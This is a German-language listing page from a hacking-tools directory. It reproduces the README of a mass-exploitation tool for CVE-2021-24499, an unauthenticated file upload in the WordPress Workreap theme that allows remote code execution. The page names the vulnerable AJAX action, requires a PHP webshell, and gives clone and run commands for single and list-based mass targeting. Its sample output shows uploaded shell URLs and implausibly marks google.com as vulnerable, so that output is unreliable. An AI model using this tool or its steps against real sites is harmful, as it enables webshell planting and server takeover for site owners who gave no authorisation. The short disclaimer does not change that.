Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-24499 — WordPress Theme Workreap 2.2.2 - Nicht authentifizierter Upload führt zu Remote-Codeausführung | Kitploit
Tools/GitHubGitHub/jayhutajulu1/cve-2021-24499
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubjayhutajulu1/cve-2021-24499

CVE-2021-24499

WordPress Theme Workreap 2.2.2 - Nicht authentifizierter Upload führt zu Remote-Codeausführung

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-24499 | Workreap – Freelance-Marktplatz- und Verzeichnis-WordPress-Theme < 2.2.2 – Beliebiger Datei-Upload

CVE License Shell

WordPress-Theme Workreap 2.2.2 – Nicht authentifizierter Datei-Upload, der zu Remote-Code-Ausführung führt

Ein leistungsstarkes und präzises Massen-Exploit-Tool für die CVE-2021-24499-Sicherheitslücke im WordPress-Workreap-Theme. Dieser Exploit ermöglicht nicht authentifizierten Datei-Upload, der zu Remote-Code-Ausführung (RCE) führen kann.

📝 Beschreibung

CVE-2021-24499 ist eine kritische Sicherheitslücke im WordPress-Theme Workreap (Version 2.2.2 und niedriger), die nicht authentifizierten Benutzern erlaubt, beliebige Dateien, einschließlich PHP-Dateien, über die AJAX-Aktion workreap_award_temp_file_uploader hochzuladen. Dies kann zu Remote-Code-Ausführung (RCE) auf dem Zielserver führen.

Verwundbare Versionen: Alle Versionen bis einschließlich 2.2.2

CVSS-Score: Kritisch

📦 Voraussetzungen

  • Bash-Shell (Linux/macOS/WSL)
  • curl-Befehlszeilentool
  • opts.php- oder shell.php-Datei (PHP-Webshell)

🔧 Installation

  1. Klonen Sie dieses Repository:
root@kitploit:~
git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
  1. Machen Sie das Skript ausführbar:
root@kitploit:~
chmod +x exploit.sh
  1. Stellen Sie sicher, dass sich opts.php oder shell.php im selben Verzeichnis befindet (Ihre PHP-Webshell)

🚀 Verwendung

Grundlegende Verwendung

Einzelnes Ziel:

root@kitploit:~
./exploit.sh -u http://target.com

Mehrere Ziele (aus Datei):

root@kitploit:~
./exploit.sh -l targets.txt

Hilfe anzeigen:

root@kitploit:~
./exploit.sh --help

Befehlszeilenoptionen

OptionBeschreibung
-u URLEin einzelnes Ziel-URL ausnutzen
-l FILEMehrere Ziele aus einer Datei ausnutzen (eine URL pro Zeile)
--helpHilfemenü anzeigen

Format der Zieldatei

Erstellen Sie eine Textdatei mit einer URL pro Zeile:

root@kitploit:~
http://target1.com
https://target2.com
http://target3.com

📸 Beispiele

Beispiel 1: Ausnutzung eines einzelnen Ziels

root@kitploit:~
$ ./exploit.sh -u https://domain.com

WordPress-Theme Workreap 2.2.2 – Nicht authentifizierter Upload, der zu Remote-Code-Ausführung führt | CVE-2021-24499
Erstellt von Jay Maranatha Hutajulu

https://domain.com/ >> ANFÄLLIG! 
 --> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php

Beispiel 2: Massenausnutzung

root@kitploit:~
$ ./exploit.sh -l targets.txt

WordPress-Theme Workreap 2.2.2 – Nicht authentifizierter Upload, der zu Remote-Code-Ausführung führt | CVE-2021-24499
Erstellt von Jay Maranatha Hutajulu

https://domain.com >> NICHT ANFÄLLIG!
https://www.google.com >> ANFÄLLIG!
https://www.domain.com >> NICHT ANFÄLLIG!
https://google.com >> ANFÄLLIG!

⚠️ Haftungsausschluss

Dieses Tool wird nur für Bildungs- und autorisierte Testzwecke bereitgestellt.

  • Verwenden Sie dieses Tool NICHT auf Systemen, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben
  • Verwenden Sie dieses Tool NICHT für illegale Aktivitäten
  • Die Autoren und Mitwirkenden sind NICHT verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden
  • Stellen Sie immer sicher, dass Sie die entsprechende Autorisierung haben, bevor Sie ein System testen
  • Verwenden Sie es verantwortungsvoll und ethisch

Durch die Nutzung dieses Tools stimmen Sie zu, es nur für legitime Sicherheitstests und Forschungszwecke zu verwenden.

🔗 Referenzen

  • Exploit-DB
  • Wordfence
  • WP-Scan

👤 Credits

Autor: Jay Maranatha Hutajulu

📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE-Datei für Details.

🤝 Mitwirken

Beiträge, Probleme und Funktionsanfragen sind willkommen! Schauen Sie sich gerne die Issues-Seite an.

⭐ Stern-Verlauf

Wenn Sie dieses Tool nützlich finden, ziehen Sie bitte in Betracht, ihm einen Stern zu geben ⭐


Denken Sie daran: Verwenden Sie Sicherheitstools immer verantwortungsvoll und ethisch. Viel Spaß beim Hacken! 🚀

Tool herunterladen